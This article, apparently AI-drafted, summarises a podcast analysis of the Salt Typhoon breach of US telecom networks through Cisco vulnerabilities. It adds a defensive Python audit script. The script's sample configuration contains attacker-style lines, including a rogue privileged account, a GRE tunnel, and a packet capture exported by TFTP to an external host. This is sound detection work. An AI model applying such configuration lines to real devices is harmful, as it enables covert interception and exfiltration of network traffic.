The Salt Typhoon Disaster: How Cisco's Own Vulnerabilities Enabled China's Massive Telecom Breach
AI-created, human-edited.
In a sobering analysis on Security Now, cybersecurity expert Steve Gibson and host Leo Laporte dissected one of the most devastating network security breaches in recent history: China's Salt Typhoon operation. What they uncovered reveals a perfect storm of negligence, design flaws, and systemic failures that gave Chinese state-sponsored hackers unprecedented access to US telecommunications infrastructure.
Cisco's Talos Intelligence Group published a comprehensive postmortem titled "Weathering the Storm in the Midst of a Typhoon," analyzing how the Salt Typhoon threat actors systematically compromised major US telecommunications companies. The irony wasn't lost on Gibson that Cisco was reverse-engineering attacks that exploited its own vulnerabilities.
The analysis revealed that Salt Typhoon maintained persistence in target environments for extended periods—in one case, over three years. These weren't simple hit-and-run attacks; they were sophisticated, long-term espionage operations using "living off the land" techniques on network devices.
Perhaps most shocking was the revelation that one of the primary attack vectors was CVE-2018-0171, a Cisco vulnerability with a devastating CVSS score of 9.8. Gibson emphasized the absurdity: "The fact that a vulnerability Cisco fixed back in 2018 was successfully used by Salt Typhoon... in 2024 is difficult to explain away. By 2024, the patch for a 2018 vulnerability would have been six years old."
This vulnerability had been sitting unpatched in critical telecommunications infrastructure for six years. As Gibson noted, "Web servers are certainly not permitted to be using any certificate that expired six years before, but critical networking gear is allowed to continue operating... with effectively expired firmware containing critical, known CVSS 9.8 scale vulnerabilities."
But the 2018 vulnerability wasn't even the worst one. Gibson revealed that CVE-2023-20198 carried the extremely rare CVSS score of 10.0—literally as bad as it gets. This vulnerability was actually covered on Security Now episode 945 in October 2023, where Gibson warned about 42,000 exposed Cisco devices.
What happened next reads like a cybersecurity horror story. The number of vulnerable devices dropped rapidly, not because administrators were patching them, but because attackers like Salt Typhoon were scanning, compromising, and then closing the door behind them to prevent other hackers from getting in.
As Gibson put it: "The bad guys... scanned, located, immediately climbed inside and said thank you very much, see you later, and shut the door behind them."
The sophistication of the Salt Typhoon operation was staggering. According to Cisco's analysis, the attackers:
- Used stolen credentials to expand their access
- Exfiltrated device configurations via TFTP and FTP
- Captured SNMP, TACACS, and RADIUS traffic, including secret keys
- Modified running configurations to create persistent backdoors
- Set up GRE tunnels for encrypted data exfiltration
- Created unexpected local accounts and modified access control lists
- Started SSH servers on high ports for persistent access
- Installed packet capture capabilities to monitor network traffic
Gibson highlighted the terrifying capability that modern Cisco devices gave attackers: "The operating systems of these Cisco devices support the installation of a tap into network interfaces, which then monitors, captures, and exports the intercepted network traffic to any external FTP server."
Both Gibson and Laporte emphasized that this disaster represents a fundamental flaw in how network infrastructure is maintained. Gibson called the current model "fundamentally broken," explaining that it creates a brittle chain requiring perfect performance from everyone involved.
"Technicians in the field are always going to appear to have better things to do than to continually run around updating the operating versions of the firmware of every device," Gibson observed. This creates natural pressure to "set it and forget it," leaving devices vulnerable to newly discovered flaws.
Gibson reserved particular criticism for Cisco's design decisions, especially regarding web management interfaces. He pointed out that 42,000 Cisco devices were globally accessible when the 2023 vulnerability was exploited, asking: "Who would ever need to allow China to access your device's management interface?"
The existence of Cisco's "hardening guide" particularly irked Gibson: "The fact that there's a hardening guide suggests that even today, Cisco still doesn't get it... A device's security ought to be difficult and require deliberate work to make any such device insecure."
He argued that secure-by-default design should make it impossible to accidentally expose management interfaces globally, rather than relying on optional hardening guides that many administrators never implement.
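As an added illustration (not code from the podcast, from Cisco Talos, or from Steve Gibson), the following Python script audits a Cisco IOS-style running configuration for the persistence indicators listed earlier (unexpected local accounts, GRE tunnels, SSH on a non-standard port, permissive ACL entries, packet capture and export) and for the management-interface exposure Gibson criticises (an HTTP management server configured with no access-class restriction). The sample configuration, the allowlist of expected accounts, and the rule names are constructed for this example; the IOS command keywords are real, but the matching is heuristic, so treat it as a starting point for a golden-config comparison rather than a complete detection.

```python
"""Heuristic audit of a Cisco IOS-style running-config for Salt Typhoon-style
persistence indicators and for an unrestricted web management interface.

Added example; not Cisco's, Talos's, or the podcast's code. The sample
configuration below is constructed and does not come from any real device.
"""
import re
from dataclasses import dataclass
from typing import Iterator, List, Optional, Set, Tuple


@dataclass
class Finding:
    rule: str      # short rule name (constructed for this example)
    line_no: int   # 1-based line in the config, 0 for config-wide findings
    text: str      # the offending line, prefixed with its parent block if any


# Constructed sample configuration: one expected admin account plus the kinds
# of changes Talos attributed to the intruders (extra account, GRE tunnel,
# permissive ACL, SSH on a high port, packet capture exported off-box).
SAMPLE_CONFIG = """\
hostname edge-rtr-01
username netops privilege 15 secret 9 $9$placeholder
username svc_backup privilege 15 secret 9 $9$placeholder
ip http server
ip http secure-server
interface Tunnel17
 tunnel mode gre ip
 tunnel source GigabitEthernet0/0
 tunnel destination 203.0.113.77
ip access-list extended MGMT
 permit ip any any
ip ssh port 57722 rotary 1
line vty 0 4
 rotary 1
 transport input ssh
monitor capture CAP interface GigabitEthernet0/1 both
monitor capture CAP export tftp://203.0.113.9/cap.pcap
"""


def parse_blocks(config: str) -> Iterator[Tuple[int, str, Optional[str]]]:
    """Yield (line_no, stripped_line, parent). IOS indents sub-commands under
    their parent command with a leading space; comments start with '!'."""
    parent: Optional[str] = None
    for no, raw in enumerate(config.splitlines(), start=1):
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue
        if raw.startswith(" "):
            yield no, raw.strip(), parent
        else:
            parent = raw.strip()
            yield no, parent, None


def audit_config(config: str, expected_users: Set[str]) -> List[Finding]:
    """Return findings for the indicators described in the Talos postmortem."""
    findings: List[Finding] = []
    lines = list(parse_blocks(config))
    top_level = {text for _, text, parent in lines if parent is None}

    for no, text, parent in lines:
        # Local accounts that are not on the operator's allowlist.
        m = re.match(r"username (\S+)", text)
        if m and m.group(1) not in expected_users:
            findings.append(Finding("unexpected-local-account", no, text))
        # GRE tunnels (used for data exfiltration in the reported intrusions).
        if parent and parent.startswith("interface Tunnel") \
                and text.startswith("tunnel mode gre"):
            findings.append(Finding("gre-tunnel", no, f"{parent}: {text}"))
        # SSH listening on something other than the standard port.
        m = re.match(r"ip ssh port (\d+)", text)
        if m and int(m.group(1)) != 22:
            findings.append(Finding("ssh-nonstandard-port", no, text))
        # Embedded packet capture, with export off-box flagged separately.
        if text.startswith("monitor capture"):
            rule = "capture-export" if " export " in text else "packet-capture"
            findings.append(Finding(rule, no, text))
        # Wide-open entries inside a named ACL.
        if parent and parent.startswith("ip access-list") \
                and re.fullmatch(r"permit ip any any", text):
            findings.append(Finding("permissive-acl", no, f"{parent}: {text}"))

    # Web management enabled without an access-class limiting who may reach it.
    web_on = any(t in top_level for t in ("ip http server", "ip http secure-server"))
    web_restricted = any(t.startswith("ip http access-class") for t in top_level)
    if web_on and not web_restricted:
        findings.append(Finding("mgmt-web-unrestricted", 0,
                                "ip http [secure-]server without ip http access-class"))
    return findings


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG, expected_users={"netops"}):
        print(f"{f.rule:26} line {f.line_no:>3}  {f.text}")
```

Run against the constructed sample, the script reports the extra account, the GRE tunnel, the permissive ACL entry, SSH on port 57722, both capture lines, and the unrestricted HTTP management interface; a configuration with only the allowlisted account and an `ip http access-class` line produces no findings. In practice the allowlist and the baseline would come from a change-controlled golden config, and the audit would run on every pulled configuration rather than once.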
The implications extend far beyond telecommunications companies. As Gibson noted, Salt Typhoon didn't just target telecom providers—they compromised ISPs and even Digital Realty, one of the largest cloud providers. The 42,000 initially compromised devices represent a massive attack surface that may never be fully cleaned.
"Given everything we know of the way today's networks are being managed, that's not a bet I would take," Gibson said when asked whether all instances of the intrusion have been found and removed.
The Salt Typhoon analysis serves as a damning indictment of current network security practices. Both hosts emphasized that this isn't just about patching—it's about fundamental design philosophy and responsibility.
Gibson drew a sharp distinction between mistakes and policies: "Mistakes happen, but policies are deliberate." In this case, Cisco's policy of allowing global access to management interfaces created the conditions for catastrophic compromise.
As Laporte pointed out, the real tragedy is that the damage isn't limited to the organizations that bought and deployed vulnerable Cisco equipment—it extends to all their customers and users. When a telecom provider is compromised, everyone who relies on their services becomes a potential victim.
The Salt Typhoon operation represents what Gibson called the moment when "the US's networks have fallen to Chinese military"—not through some dramatic cyberwar scenario, but through the mundane accumulation of unpatched vulnerabilities and poor security practices.
This analysis from Security Now serves as both a technical postmortem and a wake-up call for the entire networking industry. As critical infrastructure becomes increasingly software-defined and powerful, the consequences of "set and forget" maintenance practices become national security issues.
The question isn't whether we'll see another Salt Typhoon—it's whether we'll learn from this one before it's too late.